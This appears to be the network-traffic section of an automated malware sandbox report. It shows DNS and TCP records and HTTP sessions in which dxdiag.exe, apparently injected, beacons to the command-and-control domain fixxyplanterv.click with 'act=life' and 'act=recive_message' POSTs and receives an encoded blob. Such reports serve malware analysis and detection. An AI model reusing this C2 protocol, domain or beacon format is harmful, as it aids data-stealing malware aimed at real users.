                                                                                                    Jan 13, 2025 08:29:13.356106997 CET44349717172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:13.496712923 CET49728443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:13.496752024 CET44349728172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:13.496850967 CET49728443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:13.497251034 CET49728443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:13.497263908 CET44349728172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:13.982311010 CET44349728172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:13.982384920 CET49728443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:13.983823061 CET49728443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:13.983839989 CET44349728172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:13.984241962 CET44349728172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:13.985701084 CET49728443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:13.985816002 CET49728443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:13.985845089 CET44349728172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:14.533185959 CET44349728172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:14.533313036 CET44349728172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:14.533361912 CET49728443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:14.533478022 CET49728443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:14.533503056 CET44349728172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:14.673934937 CET49734443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:14.673968077 CET44349734172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:14.674220085 CET49734443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:14.674591064 CET49734443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:14.674603939 CET44349734172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:15.144442081 CET44349734172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:15.144516945 CET49734443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:15.145981073 CET49734443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:15.145989895 CET44349734172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:15.146239042 CET44349734172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:15.147604942 CET49734443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:15.147779942 CET49734443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:15.147814035 CET44349734172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:15.147861958 CET49734443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:15.195328951 CET44349734172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:15.663930893 CET44349734172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:15.664030075 CET44349734172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:15.664097071 CET49734443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:15.664336920 CET49734443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:15.664369106 CET44349734172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:15.857145071 CET49741443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:15.857243061 CET44349741172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:15.857340097 CET49741443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:15.857996941 CET49741443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:15.858023882 CET44349741172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:16.338269949 CET44349741172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:16.338515997 CET49741443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:16.341347933 CET49741443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:16.341378927 CET44349741172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:16.341660976 CET44349741172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:16.343000889 CET49741443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:16.343000889 CET49741443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:16.343056917 CET44349741172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:16.346216917 CET49741443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:16.346232891 CET44349741172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:16.950666904 CET44349741172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:16.950900078 CET44349741172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:16.951128960 CET49741443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:16.951589108 CET49741443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:16.951636076 CET44349741172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:17.534223080 CET49753443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:17.534266949 CET44349753172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:17.534581900 CET49753443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:17.535042048 CET49753443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:17.535064936 CET44349753172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:18.003869057 CET44349753172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:18.004044056 CET49753443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:18.005434990 CET49753443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:18.005445957 CET44349753172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:18.005676031 CET44349753172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:18.006953001 CET49753443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:18.007076025 CET49753443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:18.007081985 CET44349753172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:18.433442116 CET44349753172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:18.433532953 CET44349753172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:18.433634043 CET49753443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:18.433866978 CET49753443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:18.433883905 CET44349753172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:19.123059034 CET49765443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:19.123100996 CET44349765172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:19.123168945 CET49765443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:19.123440027 CET49765443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:19.123454094 CET44349765172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:19.579116106 CET44349765172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:19.579194069 CET49765443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:19.580421925 CET49765443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:19.580440044 CET44349765172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:19.580666065 CET44349765172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:19.605319023 CET49765443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:19.606126070 CET49765443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:19.606154919 CET44349765172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:19.606240988 CET49765443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:19.606267929 CET44349765172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:19.606369019 CET49765443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:19.606440067 CET44349765172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:19.606543064 CET49765443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:19.606568098 CET44349765172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:19.606698990 CET49765443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:19.606734037 CET44349765172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:19.606899977 CET49765443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:19.606930017 CET44349765172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:19.606941938 CET49765443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:19.607076883 CET49765443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:19.607108116 CET49765443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:19.616265059 CET44349765172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:19.616427898 CET49765443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:19.616458893 CET44349765172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:19.616482973 CET49765443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:19.616497993 CET44349765172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:19.616508007 CET49765443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:19.616518974 CET49765443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:19.616611958 CET49765443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:19.616646051 CET49765443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:19.616674900 CET49765443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:19.621570110 CET44349765172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:19.621612072 CET49765443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:19.663327932 CET44349765172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:21.079972982 CET44349765172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:21.080224991 CET44349765172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:21.080373049 CET49765443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:21.080517054 CET49765443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:21.080562115 CET44349765172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:21.145860910 CET49781443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:21.145896912 CET44349781172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:21.145956039 CET49781443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:21.146318913 CET49781443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:21.146331072 CET44349781172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:21.624165058 CET44349781172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:21.624274015 CET49781443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:21.627994061 CET49781443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:21.628000021 CET44349781172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:21.628423929 CET44349781172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:21.629937887 CET49781443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:21.629956961 CET49781443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:21.630019903 CET44349781172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:21.949625015 CET44349781172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:21.949870110 CET44349781172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:21.949928999 CET49781443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:21.950061083 CET49781443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:21.950071096 CET44349781172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:21.950082064 CET49781443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:21.950086117 CET44349781172.67.134.197192.168.2.6
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Jan 13, 2025 08:29:11.004713058 CET6332353192.168.2.61.1.1.1
                                                                                                    Jan 13, 2025 08:29:11.027338028 CET53633231.1.1.1192.168.2.6
                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Jan 13, 2025 08:29:11.004713058 CET192.168.2.61.1.1.10xb2b9Standard query (0)fixxyplanterv.clickA (IP address)IN (0x0001)false
                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Jan 13, 2025 08:29:11.027338028 CET1.1.1.1192.168.2.60xb2b9No error (0)fixxyplanterv.click172.67.134.197A (IP address)IN (0x0001)false
                                                                                                    Jan 13, 2025 08:29:11.027338028 CET1.1.1.1192.168.2.60xb2b9No error (0)fixxyplanterv.click104.21.6.116A (IP address)IN (0x0001)false
                                                                                                    • fixxyplanterv.click
                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.649711172.67.134.1974431708C:\Windows\SysWOW64\dxdiag.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-13 07:29:11 UTC266OUTPOST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 8
                                                                                                    Host: fixxyplanterv.click
                                                                                                    2025-01-13 07:29:11 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                    Data Ascii: act=life
                                                                                                    2025-01-13 07:29:12 UTC1121INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 13 Jan 2025 07:29:12 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=3docd0ddklt4ss9natk6ettcbj; expires=Fri, 09 May 2025 01:15:51 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    X-Frame-Options: DENY
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DBTPRYrXc6UIxLXQpZiHIgOip3pmM3r6fXLKPfX5ejtImo6S5eiUBxZ7VWimqJK8qL6XRZ3wYxrF%2FlpsbbzdICMrmQY23UmnO6e31vsaq3EvMenkR6hXOY62WEeFUEvwlR6yJ6zf"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 9013ac81089242b9-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2522&min_rtt=2517&rtt_var=955&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=910&delivery_rate=1138845&cwnd=191&unsent_bytes=0&cid=6a713fd0acf51105&ts=681&x=0"
                                                                                                    2025-01-13 07:29:12 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                    Data Ascii: 2ok
                                                                                                    2025-01-13 07:29:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.649717172.67.134.1974431708C:\Windows\SysWOW64\dxdiag.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-13 07:29:12 UTC267OUTPOST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 45
                                                                                                    Host: fixxyplanterv.click
                                                                                                    2025-01-13 07:29:12 UTC45OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 5a 71 63 68 4f 61 2d 2d 6e 65 77 26 6a 3d
                                                                                                    Data Ascii: act=recive_message&ver=4.0&lid=ZqchOa--new&j=
                                                                                                    2025-01-13 07:29:13 UTC1127INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 13 Jan 2025 07:29:13 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=i7knjm0pre9e727h7465993m81; expires=Fri, 09 May 2025 01:15:52 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    X-Frame-Options: DENY
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gWunH5TjMAfnji%2FsX%2B40KusnNwEe1oqcjByho%2BMOkVy2cb48WfcKAPwp3SdzJCvt8ypL3xeODJhaOWivH8HIlZPP%2F1r5YfvLE4xBzTNOdDNB4v12mDjqmby3OOj7tTFWKo8sTclB"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 9013ac87580f0f7b-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1629&min_rtt=1627&rtt_var=614&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=948&delivery_rate=1776155&cwnd=205&unsent_bytes=0&cid=9ac3f58ea6eadab4&ts=517&x=0"
                                                                                                    2025-01-13 07:29:13 UTC242INData Raw: 31 63 62 62 0d 0a 67 4f 43 55 52 57 41 47 34 32 2f 42 49 55 78 58 30 50 46 55 59 45 53 46 62 42 44 2b 49 37 4f 56 47 59 6e 45 6b 70 64 65 2f 62 66 37 77 75 4a 6e 57 6a 4c 50 54 62 4a 45 62 6d 32 6b 67 79 45 46 61 4b 63 4e 64 4e 77 5a 31 66 52 31 2b 71 47 2b 74 53 69 51 6c 62 71 47 39 53 6b 54 59 38 39 4e 70 46 6c 75 62 59 75 4b 64 67 55 71 70 31 59 79 6d 30 6e 52 39 48 58 72 70 66 6e 34 4c 70 48 55 36 49 7a 7a 4c 51 56 6c 68 77 36 74 54 43 6b 79 74 5a 41 2b 44 69 33 6f 42 48 33 63 44 35 48 77 59 36 76 2b 73 4e 6f 37 69 64 62 4e 67 65 63 75 51 6e 76 50 46 4f 4e 45 49 6e 58 71 30 7a 55 46 4a 75 6b 4b 64 4a 56 4c 32 2f 31 39 36 71 44 34 35 7a 65 62 33 2b 69 43 38 43 77 50 62 4a 4d 44 70 30 73 69 4e 4c 2b 51 64 6b 78 6d
                                                                                                    Data Ascii: 1cbbgOCURWAG42/BIUxX0PFUYESFbBD+I7OVGYnEkpde/bf7wuJnWjLPTbJEbm2kgyEFaKcNdNwZ1fR1+qG+tSiQlbqG9SkTY89NpFlubYuKdgUqp1Yym0nR9HXrpfn4LpHU6IzzLQVlhw6tTCkytZA+Di3oBH3cD5HwY6v+sNo7idbNgecuQnvPFONEInXq0zUFJukKdJVL2/196qD45zeb3+iC8CwPbJMDp0siNL+Qdkxm
                                                                                                    2025-01-13 07:29:13 UTC1369INData Raw: 34 42 59 79 78 41 47 43 78 58 6a 36 74 2b 58 34 4c 4a 6d 56 2f 63 7a 76 5a 77 56 6f 77 56 58 6a 53 79 49 37 74 35 41 35 42 53 66 6e 48 48 32 63 51 74 6e 2f 66 2b 47 70 2f 2f 6f 79 6c 64 4c 71 69 2f 45 6f 42 57 79 48 41 71 41 44 59 48 57 31 69 33 5a 61 5a 73 63 65 63 5a 39 56 33 4f 59 37 39 4f 6a 70 74 54 75 54 6c 62 72 43 38 43 6b 44 61 59 45 66 71 30 67 6c 4d 4b 43 59 50 77 38 72 35 77 4e 34 6b 30 4c 52 38 48 48 68 71 66 72 78 4d 5a 4c 54 34 6f 4b 32 61 55 4a 6a 6d 55 33 37 41 77 30 77 6f 70 51 36 46 47 54 64 54 6d 33 53 57 4a 48 77 64 36 76 2b 73 50 30 35 6e 4e 62 70 6a 66 55 76 43 58 61 42 48 36 56 4f 4b 79 65 30 6c 6a 67 49 4a 66 55 45 66 4a 70 43 32 50 78 79 37 71 48 30 74 58 4c 66 30 76 72 43 72 6d 63 6a 61 59 6f 42 71 56 51 75 64 61 33 64 4c 30 49
                                                                                                    Data Ascii: 4BYyxAGCxXj6t+X4LJmV/czvZwVowVXjSyI7t5A5BSfnHH2cQtn/f+Gp//oyldLqi/EoBWyHAqADYHW1i3ZaZscecZ9V3OY79OjptTuTlbrC8CkDaYEfq0glMKCYPw8r5wN4k0LR8HHhqfrxMZLT4oK2aUJjmU37Aw0wopQ6FGTdTm3SWJHwd6v+sP05nNbpjfUvCXaBH6VOKye0ljgIJfUEfJpC2Pxy7qH0tXLf0vrCrmcjaYoBqVQuda3dL0I
                                                                                                    2025-01-13 07:29:13 UTC1369INData Raw: 4a 70 4f 33 50 73 37 70 65 62 33 37 58 7a 48 6c 63 69 42 34 69 51 49 4a 72 51 4f 72 55 30 70 49 2f 4b 4d 65 42 74 6d 34 41 49 79 78 41 48 63 39 6e 50 74 74 50 2f 34 50 35 48 62 37 59 66 35 4c 77 4a 6b 6a 41 69 6e 53 43 55 32 76 35 63 6b 43 43 62 76 43 33 4f 57 53 35 47 35 4f 2b 79 2b 73 4b 31 38 72 73 4c 70 77 4d 4d 6b 44 47 71 47 47 2b 4e 63 59 43 7a 79 6c 44 70 43 66 71 63 44 65 70 6c 45 33 76 5a 78 35 61 50 36 2b 54 53 52 31 76 43 4e 38 69 63 4f 62 49 73 41 72 55 63 6d 50 4c 6d 59 4d 41 49 6e 37 55 34 38 33 45 62 4a 74 79 4f 72 6b 76 66 35 4d 5a 43 58 31 34 48 34 4b 51 56 79 77 52 4c 74 57 6d 34 79 76 74 4e 75 51 69 72 75 44 6e 6d 57 52 64 48 77 64 75 36 6c 39 2f 59 78 6d 4e 2f 73 68 66 49 72 43 32 6d 48 44 61 52 48 4b 79 65 33 6d 6a 6f 4f 5a 71 6c 4f
                                                                                                    Data Ascii: JpO3Ps7peb37XzHlciB4iQIJrQOrU0pI/KMeBtm4AIyxAHc9nPttP/4P5Hb7Yf5LwJkjAinSCU2v5ckCCbvC3OWS5G5O+y+sK18rsLpwMMkDGqGG+NcYCzylDpCfqcDeplE3vZx5aP6+TSR1vCN8icObIsArUcmPLmYMAIn7U483EbJtyOrkvf5MZCX14H4KQVywRLtWm4yvtNuQiruDnmWRdHwdu6l9/YxmN/shfIrC2mHDaRHKye3mjoOZqlO
                                                                                                    2025-01-13 07:29:13 UTC1369INData Raw: 2f 75 4f 2b 79 71 73 4b 31 38 6c 74 7a 77 6a 50 67 75 44 32 4b 4a 43 71 31 4f 4a 54 4f 35 6c 44 45 45 4b 2b 38 44 64 35 39 41 31 66 31 70 36 4b 33 36 2b 44 62 66 6d 36 4b 46 37 6d 64 61 4a 4b 59 42 69 6c 4d 31 4a 36 54 54 4b 55 77 2f 70 77 6c 2b 33 42 6d 52 39 48 54 69 71 66 6a 39 4d 35 44 52 37 49 54 77 4b 67 64 72 69 78 2b 72 54 53 4d 2b 76 5a 67 6b 41 69 76 6a 41 6e 61 55 53 74 75 33 4e 61 75 68 36 4c 56 6b 33 2b 44 76 6a 66 59 6b 46 43 53 65 51 37 6f 44 4b 54 6e 79 79 33 59 4f 4b 4f 63 42 66 70 42 4b 32 66 5a 33 35 61 48 31 2f 44 53 58 78 2b 4f 47 2f 69 59 4d 61 34 41 4a 70 6b 59 71 4d 72 61 56 4f 55 4a 6f 70 77 6c 71 33 42 6d 52 32 46 7a 65 35 4e 48 50 66 49 43 62 2b 38 4c 78 4b 30 49 38 77 51 47 67 54 79 59 36 74 4a 6f 36 43 43 2f 73 41 6e 6d 59 54
                                                                                                    Data Ascii: /uO+yqsK18ltzwjPguD2KJCq1OJTO5lDEEK+8Dd59A1f1p6K36+Dbfm6KF7mdaJKYBilM1J6TTKUw/pwl+3BmR9HTiqfj9M5DR7ITwKgdrix+rTSM+vZgkAivjAnaUStu3Nauh6LVk3+DvjfYkFCSeQ7oDKTnyy3YOKOcBfpBK2fZ35aH1/DSXx+OG/iYMa4AJpkYqMraVOUJopwlq3BmR2Fze5NHPfICb+8LxK0I8wQGgTyY6tJo6CC/sAnmYT
                                                                                                    2025-01-13 07:29:13 UTC1369INData Raw: 6b 70 2f 48 7a 4c 70 6a 63 38 49 7a 37 4b 41 70 73 69 41 79 6e 52 69 4d 7a 76 70 6b 33 42 53 6a 70 42 6a 4c 53 41 64 62 76 4f 37 50 6d 30 65 55 6e 6a 63 50 76 6f 2f 73 6f 51 6e 76 50 46 4f 4e 45 49 6e 58 71 30 7a 38 51 49 75 6f 63 65 35 74 50 33 76 52 70 36 71 76 37 35 7a 75 51 30 65 57 4f 38 43 67 45 5a 59 51 48 72 30 51 72 50 72 32 66 64 6b 78 6d 34 42 59 79 78 41 48 2f 2f 47 6a 38 70 66 37 2b 4b 6f 53 56 2f 63 7a 76 5a 77 56 6f 77 56 58 6a 51 43 55 2b 74 70 4d 36 41 69 4c 71 44 6d 43 54 52 74 62 2b 63 50 6d 73 39 2f 49 33 6c 39 37 74 68 4f 51 72 44 48 61 45 48 37 45 44 59 48 57 31 69 33 5a 61 5a 74 45 4a 59 6f 78 43 6b 38 5a 74 36 4c 44 37 2b 44 44 66 79 71 79 62 74 69 41 4f 4a 4e 6c 4e 70 55 77 6e 4e 72 32 53 50 77 34 72 34 67 64 33 6e 55 66 56 2f 58
                                                                                                    Data Ascii: kp/HzLpjc8Iz7KApsiAynRiMzvpk3BSjpBjLSAdbvO7Pm0eUnjcPvo/soQnvPFONEInXq0z8QIuoce5tP3vRp6qv75zuQ0eWO8CgEZYQHr0QrPr2fdkxm4BYyxAH//Gj8pf7+KoSV/czvZwVowVXjQCU+tpM6AiLqDmCTRtb+cPms9/I3l97thOQrDHaEH7EDYHW1i3ZaZtEJYoxCk8Zt6LD7+DDfyqybtiAOJNlNpUwnNr2SPw4r4gd3nUfV/X
                                                                                                    2025-01-13 07:29:13 UTC1369INData Raw: 74 53 50 52 7a 4b 4b 46 2b 6d 64 61 4a 49 49 4b 6f 45 49 6b 50 4c 36 63 4d 51 59 30 37 51 6c 67 6e 55 44 61 2b 6e 66 72 71 2f 33 2f 50 5a 62 59 37 6f 2f 78 49 41 31 68 77 55 50 6a 52 44 5a 31 36 74 4d 58 44 79 33 72 56 53 6a 63 58 70 2f 75 4f 2b 79 71 73 4b 31 38 6e 39 2f 6e 69 50 73 6b 44 57 65 54 44 4b 56 52 4c 6a 69 34 67 54 77 4a 49 2b 6f 44 66 35 39 48 31 2f 78 33 2b 61 2f 77 39 6a 66 66 6d 36 4b 46 37 6d 64 61 4a 4b 49 61 74 55 6b 70 4f 61 53 59 4e 77 45 77 36 68 34 79 30 67 48 41 38 47 71 72 2f 75 62 6c 4b 35 6a 4b 72 4a 75 32 49 41 34 6b 32 55 32 6c 53 69 67 79 74 4a 30 6b 42 79 44 6f 41 58 75 56 52 64 6e 30 65 2b 2b 69 39 2f 41 2f 6b 39 37 6c 67 66 6b 6a 43 32 71 49 41 75 4d 4e 62 6a 4b 71 30 32 35 43 42 2f 77 4e 66 70 45 42 7a 72 6c 69 71 36 48
